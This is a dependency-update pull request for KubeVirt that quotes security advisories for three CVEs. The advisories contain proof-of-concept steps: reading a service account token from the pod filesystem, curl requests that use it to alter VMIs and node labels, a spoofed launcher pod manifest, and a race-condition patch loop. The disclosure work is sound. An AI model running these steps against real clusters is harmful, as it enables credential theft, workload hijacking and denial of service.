
Conversation

@redhat-renovate-bot redhat-renovate-bot commented Dec 4, 2025

This PR contains the following updates:

Package Type Update Change
kubevirt.io/kubevirt require minor v1.4.0 -> v1.7.0

GitHub Vulnerability Alerts

CVE-2025-64436

Summary

The permissions granted to the virt-handler service account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.

Details

Following the GitHub security advisory published on March 23 2023, a ValidatingAdmissionPolicy was introduced to impose restrictions on which sections of node resources the virt-handler service account can modify. For instance, the spec section of nodes has been made immutable, and modifications to the labels section are now limited to kubevirt.io-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

However, if a virt-handler service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, virt-handler sets a specific kubevirt.io boolean label, kubevirt.io/schedulable, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to false, thereby forcing all VMI instances to be scheduled exclusively on the compromised node.
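
For illustration, the label-patch primitive described above can also be expressed with client-go. This is a minimal sketch, assuming the caller already runs with the virt-handler service account credentials (the advisory's own PoC uses curl further below); the target node name is only an example.

// Sketch only: flips kubevirt.io/schedulable to "false" on a target node
// using client-go, assuming the credentials in use belong to the virt-handler
// service account. Node and label names follow the advisory.
package main

import (
	"context"
	"fmt"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/types"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/rest"
)

func main() {
	cfg, err := rest.InClusterConfig() // e.g. when run from the compromised pod
	if err != nil {
		panic(err)
	}
	client, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		panic(err)
	}

	// Strategic-merge patch equivalent to the curl request shown in the PoC.
	patch := []byte(`{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}`)
	node := "minikube-m02" // example target node

	_, err = client.CoreV1().Nodes().Patch(context.Background(), node,
		types.StrategicMergePatchType, patch, metav1.PatchOptions{})
	if err != nil {
		panic(err)
	}
	fmt.Println("patched", node)
}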

Another finding describes how a compromised virt-handler instance can perform operations on other nodes that are intended to be executed solely by virt-api. This significantly increases both the impact and the likelihood of the vulnerability being exploited.

Additionally, by default, the virt-handler service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet's NodeRestriction feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.
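
A cluster administrator can confirm the breadth of these permissions with a SubjectAccessReview. The sketch below assumes the virt-handler service account is named kubevirt-handler and lives in the kubevirt namespace; both names are assumptions about a typical deployment, adjust them for your installation.

// Sketch: ask the API server whether the (assumed) virt-handler service
// account may update VMIs in an arbitrary namespace. The service account
// name and namespace are assumptions, not taken from the advisory.
package main

import (
	"context"
	"fmt"

	authorizationv1 "k8s.io/api/authorization/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/tools/clientcmd"
)

func main() {
	cfg, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	if err != nil {
		panic(err)
	}
	client, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		panic(err)
	}

	sar := &authorizationv1.SubjectAccessReview{
		Spec: authorizationv1.SubjectAccessReviewSpec{
			User: "system:serviceaccount:kubevirt:kubevirt-handler", // assumed SA name
			ResourceAttributes: &authorizationv1.ResourceAttributes{
				Group:     "kubevirt.io",
				Resource:  "virtualmachineinstances",
				Verb:      "update",
				Namespace: "default", // a namespace whose VMIs do not run on the handler's node
			},
		},
	}
	res, err := client.AuthorizationV1().SubjectAccessReviews().Create(
		context.Background(), sar, metav1.CreateOptions{})
	if err != nil {
		panic(err)
	}
	fmt.Printf("allowed=%v reason=%q\n", res.Status.Allowed, res.Status.Reason)
}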

PoC

By injecting incorrect data into a running VMI, for example, by altering the kubevirt.io/nodeName label to reference a different node, the VMI is marked as terminated and its state transitions to Succeeded. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI:

apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: testvm
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: testvm
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The VMI is then created on a minikube node identified with minikube-m02:

operator@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   20s   Running   10.244.1.8   minikube-m02   True

Assume that a virt-handler pod running on node minikube-m03 is compromised and that the attacker wants testvm to be re-deployed on a node under their control.

First, we retrieve the virt-handler service account token in order to be able to perform requests to the Kubernetes API:

# Get the `virt-handler` pod name
attacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler
virt-handler-kblgh               1/1     Running   0          8d

# get the `virt-handler` SA account token
attacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) 

The attacker updates the VMI object labels in a way that makes it terminate:

# Save the current state of the VMI
attacker@minikube-m03:~$ kubectl get vmi testvm -o json > testvm.json

# replace the current `nodeName` to another one in the JSON file
attacker@minikube-m03:~$ sed -i 's/"kubevirt.io\/nodeName": "minikube-m02"/"kubevirt.io\/nodeName": "minikube-m03"/g' testvm.json 

# Perform the UPDATE request, impersonating the virt-handler
attacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @testvm.json -H "Content-Type: application/json" -H "Authorization: bearer $token"

# Get the current state of the VMI after the UPDATE
attacker@minikube-m03:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore

# Get the current state of the pod after the UPDATE
attacker@minikube-m03:~$ kubectl get pods | grep launcher
virt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed

Now, the attacker can use the excessive permissions of the virt-handler service account to patch the minikube-m02 node in order to mark it as unschedulable for VMI workloads:

attacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}' -X PATCH

Note: This request could require multiple invocations as the virt-handler is continuously updating the schedulable state of the node it is running on.

Finally, an admin user decides to restart the VMI:

admin@minikube:~$ kubectl delete -f testvm.yaml
admin@minikube:~$ kubectl apply -f testvm.yaml
admin@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP            NODENAME       READY
testvm   80s   Running   10.244.0.15   minikube-m03   True

Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the userInfo object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes' NodeRestriction feature gate. Since Kubernetes version 1.32, the node authorization mode, enforced via the NodeRestriction admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.

An alternative approach would be to create a dedicated virt-handler service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the userInfo.username field of the AdmissionRequest object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.
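
As a rough illustration of the second option, the check performed by such an admission webhook could look like the following. The per-node service account naming scheme (system:serviceaccount:kubevirt:kubevirt-handler-<node>) is purely hypothetical; this is not KubeVirt's implementation, only a sketch of the idea.

// Sketch of a node-identity check for an admission webhook, assuming a
// hypothetical per-node service account naming scheme.
package main

import (
	"fmt"
	"strings"

	admissionv1 "k8s.io/api/admission/v1"
	authenticationv1 "k8s.io/api/authentication/v1"
)

const saPrefix = "system:serviceaccount:kubevirt:kubevirt-handler-" // hypothetical

// nodeFromUserInfo extracts the node name embedded in the (assumed) per-node
// service account username, or "" if the request did not come from one.
func nodeFromUserInfo(ui authenticationv1.UserInfo) string {
	if !strings.HasPrefix(ui.Username, saPrefix) {
		return ""
	}
	return strings.TrimPrefix(ui.Username, saPrefix)
}

// allowNodePatch rejects node mutations issued by a handler running on a
// different node than the one being patched.
func allowNodePatch(req *admissionv1.AdmissionRequest) bool {
	origin := nodeFromUserInfo(req.UserInfo)
	return origin != "" && origin == req.Name
}

func main() {
	req := &admissionv1.AdmissionRequest{
		Name:     "minikube-m02",
		UserInfo: authenticationv1.UserInfo{Username: saPrefix + "minikube-m03"},
	}
	fmt.Println("allowed:", allowNodePatch(req)) // false: cross-node patch is rejected
}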

Impact

This vulnerability could allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

CVE-2025-64435

Summary

A logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).

Details

A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate virt-launcher pod associated with the VMI.

The virt-launcher pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with virt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).

When virt-controller receives a notification about a change in a VMI's state, it attempts to identify the corresponding virt-launcher pod. This is necessary in several scenarios, including:

  • When hardware devices are requested to be hotplugged into the VMI—they must also be hotplugged into the associated virt-launcher pod.
  • When additional RAM is requested—this may require updating the virt-launcher pod's cgroups.
  • When additional CPU resources are added—this may also necessitate modifying the virt-launcher pod's cgroups.
  • When the VMI is scheduled to migrate to another node.

The core issue lies in the implementation of the GetControllerOf function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate virt-launcher, thereby compromising the VMI's integrity and control mechanisms.

//pkg/controller/controller.go

func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
	// Get all pods from the VMI namespace which contain the label "kubevirt.io"
	objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
	if err != nil {
		return nil, err
	}
	pods := []*k8sv1.Pod{}
	for _, obj := range objs {
		pod := obj.(*k8sv1.Pod)
		pods = append(pods, pod)
	}

	var curPod *k8sv1.Pod = nil
	for _, pod := range pods {
		if !IsControlledBy(pod, vmi) {
			continue
		}

		if vmi.Status.NodeName != "" &&
			vmi.Status.NodeName != pod.Spec.NodeName {
			// This pod isn't scheduled to the current node.
			// This can occur during the initial migration phases when
			// a new target node is being prepared for the VMI.
			continue
		}
		// take the most recently created pod
		if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
			curPod = pod
		}
	}
	return curPod, nil
}
// pkg/controller/controller_ref.go

// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
	controllerRef := metav1.GetControllerOf(pod)
	if controllerRef != nil {
		return controllerRef
	}
	// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
	if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
		name := pod.Annotations[virtv1.DomainAnnotation]
		uid := types.UID(createdBy)
		vmi := virtv1.NewVMI(name, uid)
		return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
	}
	return nil
}

func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
	if controllerRef := GetControllerOf(pod); controllerRef != nil {
		return controllerRef.UID == vmi.UID
	}
	return false
}

The current logic assumes that a virt-launcher pod associated with a VMI may not always have a controllerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically, it evaluates the kubevirt.io/created-by label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the virt-controller selects the most recently created one.

This logic appears to be designed with migration scenarios in mind, where it is expected that two virt-launcher pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate virt-launcher pod lacks a controllerRef and relies solely on labels (such as kubevirt.io/created-by) to indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate virt-launcher pod. As a result, the CurrentVMIPod function could mistakenly return the attacker-controlled pod instead of the authentic one.
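
A minimal, self-contained reproduction of the matching logic (re-implemented locally from the excerpt above rather than imported from the KubeVirt packages) shows that a pod carrying only the kubevirt.io/created-by label, with no ownerReference at all, is treated as controlled by the VMI:

// Standalone sketch mirroring the fallback in GetControllerOf/IsControlledBy
// above; the KubeVirt helpers are re-implemented here so the example does not
// depend on internal packages.
package main

import (
	"fmt"

	k8sv1 "k8s.io/api/core/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/types"
)

const createdByLabel = "kubevirt.io/created-by" // value of virtv1.CreatedByLabel

// controllerUIDOf mirrors GetControllerOf: prefer a real controllerRef,
// otherwise fall back to the created-by label.
func controllerUIDOf(pod *k8sv1.Pod) types.UID {
	if ref := metav1.GetControllerOf(pod); ref != nil {
		return ref.UID
	}
	return types.UID(pod.Labels[createdByLabel])
}

func main() {
	vmiUID := types.UID("18afb8bf-70c4-498b-aece-35804c9a0d11") // UID from the PoC

	fake := &k8sv1.Pod{ObjectMeta: metav1.ObjectMeta{
		Name:   "fake-launcher",
		Labels: map[string]string{createdByLabel: string(vmiUID)},
		// note: no OwnerReferences at all
	}}

	// The fallback matches the attacker pod to the VMI purely by label.
	fmt.Println("treated as controlled by VMI:", controllerUIDOf(fake) == vmiUID) // true
}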

This vulnerability has at least two serious consequences:

  • The attacker could disrupt or seize control over the VMI's lifecycle operations.
  • The attacker could potentially influence the VMI's migration target node, bypassing node-level security constraints such as nodeSelector or nodeAffinity, which are typically used to enforce workload placement policies.

PoC

Consider the following VMI definition:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-label-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml

# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11

# Find the UIDs of the `virt-launcher` pods associated with the VMI (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}

The UID of the VMI can also be found as an argument to the container in the virt-launcher pod:

# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
  "command": [
    "/usr/bin/virt-launcher-monitor",
    ...
    "--uid",
    "18afb8bf-70c4-498b-aece-35804c9a0d11", 
    "--namespace",
    "default",
    ...

Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the kubevirt.io/created-by label:

apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
    kubevirt.io/domain: migration
spec:
  restartPolicy: Never
  containers:
    - name: alpine
      image: alpine
      command: [ "sleep", "3600" ]
operator@minikube:~$ kubectl apply -f fake-launcher.yaml

# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13

To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:

# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched

# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID

To illustrate the impact of this vulnerability, a race condition will be triggered in the sync function of the VMI controller:

// pkg/virt-controller/watch/vmi.go

func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
  //...
  if !isTempPod(pod) && controller.IsPodReady(pod) {

		// mark the pod with annotation to be evicted by this controller
		newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
		maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
    // here a new updated pod is returned
		patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
		if err != nil {
			return common.NewSyncError(err, controller.FailedPodPatchReason), pod
		}
		pod = patchedPod
    // ...

func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
	patchSet := patch.New()
	for key, newValue := range newAnnotations {
		if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
			patchSet.AddOption(
				patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
			)
		}
	}
	if patchSet.IsEmpty() {
		return pod, nil
	}
	
	patchBytes, err := patchSet.GeneratePayload()
	// ...
	patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
  // ...
	return patchedPod, nil
}

The above code adds additional annotations to the virt-launcher pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:

// pkg/virt-controller/watch/vmi.go

func isTempPod(pod *k8sv1.Pod) bool {
  // EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
	_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
	return ok
}
// pkg/virt-controller/watch/vmi.go

func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
  // ...
  vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
	tempPodExists := controller.PodExists(pod) && isTempPod(pod)

  //...
  case vmi.IsRunning():
		if !vmiPodExists {
      // MK: this will toggle the VMI phase to Failed
			vmiCopy.Status.Phase = virtv1.Failed
			break
		}
    //...

  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
	if vmiChanged {
    // MK: this will detect that the phase of the VMI has changed and updated the resource
		key := controller.VirtualMachineInstanceKey(vmi)
		c.vmiExpectations.SetExpectations(key, 1, 0)
		_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
		if err != nil {
			c.vmiExpectations.LowerExpectations(key, 1, 0)
			return err
		}
	}

To trigger it, the attacker should add the following annotation to the fake-launcher pod after the if !isTempPod(pod) && controller.IsPodReady(pod) check in sync has passed, but before the patch API call in syncPodAnnotations, so that the pod object returned by the patch already carries the annotation when updateStatus evaluates vmiPodExists := controller.PodExists(pod) && !isTempPod(pod):

annotations:
    kubevirt.io/ephemeral-provisioning: "true"

The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).

The update should also happen during the reconciliation loop when the fake-launcher pod is initially going to be associated with the VMI and its labels, related to eviction, updated.
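
For completeness, a sketch of the annotation update the attacker would race with, issued against their own fake-launcher pod with ordinary namespace-level permissions. The tight retry loop is only a blunt approximation; reliably landing inside the window described above is the hard part, and pod name, namespace, and interval are illustrative.

// Sketch: repeatedly stamp the fake-launcher pod with the
// kubevirt.io/ephemeral-provisioning annotation so that one patch lands
// inside the race window described above.
package main

import (
	"context"
	"time"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/types"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/tools/clientcmd"
)

func main() {
	cfg, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	if err != nil {
		panic(err)
	}
	client, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		panic(err)
	}

	patch := []byte(`{"metadata":{"annotations":{"kubevirt.io/ephemeral-provisioning":"true"}}}`)
	for i := 0; i < 100; i++ {
		// Errors are ignored on purpose: the loop just keeps re-applying the patch.
		_, _ = client.CoreV1().Pods("default").Patch(context.Background(),
			"fake-launcher", types.StrategicMergePatchType, patch, metav1.PatchOptions{})
		time.Sleep(50 * time.Millisecond)
	}
}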

Upon successful exploitation, the VMI is marked as Failed and can no longer be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:

operator@minikube:~$ kubectl get vmi
NAME                       AGE    PHASE    IP            NODENAME   READY
launcher-label-confusion   128m   Failed   10.244.0.10   minikube   False

# The VMI is not reachable anymore 
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status

# The two pods are still associated with the VMI

operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}' 
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}

Impact

As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.


KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

Summary

Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.

Details

Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server and proxies VM lifecycle API requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS: the former acts as the client while the latter acts as the server. The client certificate used by virt-api is defined in the source code as follows and has the following properties:

//pkg/virt-api/api.go

const (
	...
	defaultCAConfigMapName     = "kubevirt-ca"
  ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)
##### verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client certificates using a self-signed root CA. The latter is generated by virt-operator when the KubeVirt stack is deployed and is stored in a ConfigMap in the kubevirt namespace. This ConfigMap is used as a trust anchor by all virt-handler instances to verify client certificates.

##### inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138

The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

##### the virt-handler's server certificate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate:

<code.sec.SetupTLSForVirtHandlerServer>

//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
	
	//...
				// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
				VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
					return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
				},
				//...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
  //...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	//...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	//...

The above code illustrates that client certificates accepted by virt-handler must have the CN kubevirt.io:system:client:virt-handler, which is the same CN as the one present in virt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a virt-handler instance.

In addition to the extension API server (virt-api), any other virt-handler instance can communicate with a given virt-handler. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes use structures called ProxyManager to communicate back and forth on the state of the migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by both virt-handler and virt-api shares the same CN field, despite the use of different, randomly allocated ports for the two types of communication.
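
One possible hardening direction (a sketch under stated assumptions, not KubeVirt's actual fix) is to make each listener require a role-specific client CN, so the migration endpoint would no longer accept the CN that virt-api presents. The alternative CN used below is hypothetical.

// Sketch: a VerifyPeerCertificate callback parameterized by the exact CN a
// given listener expects, so a migration endpoint could require e.g.
// "kubevirt.io:system:client:virt-handler-migration" while the lifecycle
// endpoint keeps "kubevirt.io:system:client:virt-handler".
package main

import (
	"crypto/tls"
	"crypto/x509"
	"fmt"
)

func verifyExpectedCN(certPool *x509.CertPool, expectedCN string) func([][]byte, [][]*x509.Certificate) error {
	return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
		if len(rawCerts) == 0 {
			return fmt.Errorf("no client certificate presented")
		}
		cert, err := x509.ParseCertificate(rawCerts[0])
		if err != nil {
			return err
		}
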